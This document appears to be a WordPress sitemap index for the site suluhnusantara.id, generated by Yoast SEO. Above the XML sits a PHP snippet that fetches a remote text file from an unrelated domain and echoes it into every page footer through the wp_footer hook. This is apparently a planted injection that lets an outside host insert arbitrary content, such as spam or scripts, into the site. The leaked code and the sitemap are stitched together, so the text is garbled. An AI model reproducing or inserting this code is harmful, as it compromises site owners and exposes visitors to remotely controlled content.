
function load_external_content() {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://pausgundik.com/a.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$a = curl_exec($ch);
curl_close($ch);
echo $a;
}

add_action('wp_footer', 'load_external_content');<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//suluhnusantara.id/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://suluhnusantara.id/post-sitemap.xml</loc>
		<lastmod>2025-12-09T09:42:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://suluhnusantara.id/post-sitemap2.xml</loc>
		<lastmod>2025-12-09T09:42:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://suluhnusantara.id/page-sitemap.xml</loc>
		<lastmod>2022-12-08T09:51:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://suluhnusantara.id/category-sitemap.xml</loc>
		<lastmod>2025-12-09T09:42:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://suluhnusantara.id/post_tag-sitemap.xml</loc>
		<lastmod>2024-08-31T01:35:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://suluhnusantara.id/author-sitemap.xml</loc>
		<lastmod>2023-06-30T11:58:38+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->